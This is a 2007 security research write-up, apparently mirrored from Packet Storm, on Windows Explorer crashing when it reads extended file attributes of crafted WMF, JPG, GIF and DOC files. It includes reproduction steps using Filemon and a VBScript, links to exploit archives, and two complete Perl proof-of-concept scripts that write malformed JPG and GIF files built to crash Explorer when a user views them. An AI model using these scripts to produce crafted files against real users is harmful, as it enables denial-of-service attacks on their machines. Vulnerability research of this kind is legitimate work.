Lucene search
K

wef-study.txt

🗓️ 11 Aug 2007 00:00:00Reported by LostmonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Windows Extended file attributes buffer overflow study II, vulnerabilities in Microsoft Windows GDI and ole32, exploits crash wen explorer looks EFA for specific file types

Code
`##########################################################  
Windows Extended file attributes buffer overflow Study II  
##########################################################  
  
In a previous article , i write about extended file  
attributes:  
  
"A local buffer overflow exists in the windows explorer .  
The extended file atributes functions have a small size  
of the buffer in 'FileAllInformation(),FileNameInformation'  
and other subfunctions in Undocumented functions of NTDLL ,  
resulting in a buffer overflow. With a unknow impact."  
  
Original article:  
  
http://lostmon.blogspot.com/2007/06/  
buffer-overflow-in-extended-file.html  
  
I Write "this issue could be done in all files"...  
  
Now i go to extend some details moore of my investigation  
and the research of this issue.  
  
Look the new vulnerabilities on Microsoft windows GDI and ole32  
  
http://www.securityfocus.com/bid/16167  
http://www.securityfocus.com/bid/25207  
http://secunia.com/advisories/10020/  
http://secunia.com/advisories/10194/  
http://osvdb.org/displayvuln.php?osvdb_id=31885  
http://osvdb.org/displayvuln.php?osvdb_id=31886  
http://osvdb.org/displayvuln.php?osvdb_id=31887  
  
All PoC and all exploits have some details to study.  
  
All files wen explorer crash ,crashing wen try to look  
the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)  
How to demostrate it ??  
  
All exploits have some similitudes ....  
all crafted files crashing at the same point or at the same properties  
this is a litle test/study of those exploits / vulnerabilities  
  
  
############################################  
Testing with filemon and EFA.vbs  
############################################  
  
  
####################  
Exploit wmf File  
####################  
  
Download BID 16167 exploit and unzip it in c:\test  
  
open filemon and include process explorer.exe  
and click in apply.  
now open c:\test\ and wen explorer looks the EFA for the wmf  
file , crash , or wen put the mouse over...  
  
in the filemon wen the crash is done we have some similar to  
  
http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_WMF.GIF  
  
filemon mark the overflow in 'FileAllInformation()' function.  
  
another test with the same file :  
  
save EFA_test.vbs and execute it , the windows scripting host  
crash wen try to look extended attribute number 9 (Author).  
  
delete the doc file in a dos command line :)  
  
####################  
Exploit jpg file  
####################  
  
Download BID 25207 exploit and unzip it in c:\test  
  
open filemon and include process explorer.exe  
and click in apply.  
now open c:\test\ and wen explorer looks the EFA for the jpg  
file , crash , or wen put the mouse over...  
  
in the filemon wen the crash is done we have some similar to  
  
http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_jpg.GIF  
  
filemon mark the overflow in 'FileAllInformation()' function.  
  
another test with the same file :  
  
save EFA_test.vbs and execute it , the windows scripting host  
crash wen try to look extended attribute number 9 (Author).  
  
delete the doc file in a dos command line :)  
  
###################  
exploit Gif file  
###################  
  
save exploit for Gif file in c:\test  
  
open filemon and include process explorer.exe  
and click in apply.  
now open c:\test\ and wen explorer looks the EFA for the gif  
file , crash , or wen put the mouse over...  
  
in the filemon wen the crash is done we have some similar to  
  
http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_art.GIF  
  
filemon mark the overflow in 'FileAllInformation()' function.  
  
another test with the same file :  
  
save EFA_test.vbs and execute it , the windows scripting host  
crash wen try to look extended attribute number 9 (Author).  
  
delete the doc file in a dos command line :)  
  
###################  
Exploit Doc file  
###################  
  
unzip the explorer_crasher.doc in c:\test\  
open filemon and include process explorer.exe  
and click in apply.  
now open c:\test\ and wen explorer looks the EFA for the doc  
file , crash , or wen put the mouse over...  
  
in the filemon wen the crash is done we have some similar to  
  
IMAGEN DEL DOC  
  
filemon mark the overflow in 'FileAllInformation()' function.  
  
another test with the same file :  
  
save EFA_test.vbs and execute it , the windows scripting host  
crash wen try to look extended attribute number 9 (Author).  
  
delete the doc file in a dos command line :)  
#################################  
LINKS AND FILES NEEDED  
#################################  
  
For testing this you need all exploits , filemon and EFA.vbs.  
  
Download filemon :  
  
http://www.microsoft.com/technet/  
sysinternals/FileAndDisk/Filemon.mspx  
  
Download Exploit Word file DoS :  
  
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar  
  
Download exploit BID 16167:  
  
http://www.securityfocus.com/data/  
vulnerabilities/exploits/WMF-DoS.rar  
  
Exploit BID 25207 :  
########################################################  
#!/usr/bin/perl  
  
#Bug found and ExpLoitEd by CrazyAngel  
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria  
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans  
  
print "\nJPG PoC denial of service exploit by CrazyAngel ";  
print "\n\ngenerating something.jpg...";  
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";  
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";  
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";  
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";  
print JPG "\x00\x00\x00\x00";  
close(JPG);  
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";  
  
####################################################################  
  
  
Save Gif file gdi32.dll DoS :  
  
###############################################################  
#!/usr/bin/perl  
###############################################################  
# Bug Found By ::DeltahackingTEAM  
##  
# Coded By Reza.Yavari (Dr.Pantagon)  
##  
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And  
Www.PersianWhois.com  
##  
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net  
##  
#Email: Dr.Pantagon [A]Deltasecurity.ir  
##  
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem  
  
print "\nGIF PoC denial of service exploit by Dr.Pantagon <  
[email protected]>";  
print "\n\ngenerating Art.gif...";  
print "\n\nUsage :";  
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";  
print "\n\n2- Single Click Art.gif For Excute Exploit ";  
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";  
print "\n\n4- More... ";  
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or  
Delete Art.gif For Run(Excute) Exploit";  
open(gif, ">./Art.gif") or die "cannot create gif file\n";  
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";  
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";  
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";  
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";  
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";  
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";  
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";  
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";  
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";  
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";  
close(gif);  
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";  
  
# milw0rm.com [2007-07-23]  
####################################################################  
  
Save EFA_test.vbs:  
  
#######################  
EFA_test.vbs  
########################  
  
Dim arrHeaders(35)  
Set objShell = CreateObject("Shell.Application")  
Set objFolder = objShell.Namespace("C:\test")  
For i = 0 to 34  
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)  
Next  
For Each strFileName in objFolder.Items  
For i = 0 to 34  
Wscript.Echo i & vbtab & arrHeaders(i) _  
& ": " & objFolder.GetDetailsOf(strFileName, i)  
Next  
Next  
#########################################################  
######################## €nd #########################  
  
Thnx to estrella to be my ligth  
Thnx To FalconDeOro Hi is investigate and documented with me this issue.  
Thnx to Icaro and Badchecksum Team for interesting in research.  
Thnx To Jkouns and Jericho for his patience.  
Thnx to All osvdb Maglers they are involved in a very nice project.  
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers  
Thnx to All Lostmon´s Group Team  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
  
  
--  
La curiosidad es lo que hace mover la mente....  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4
26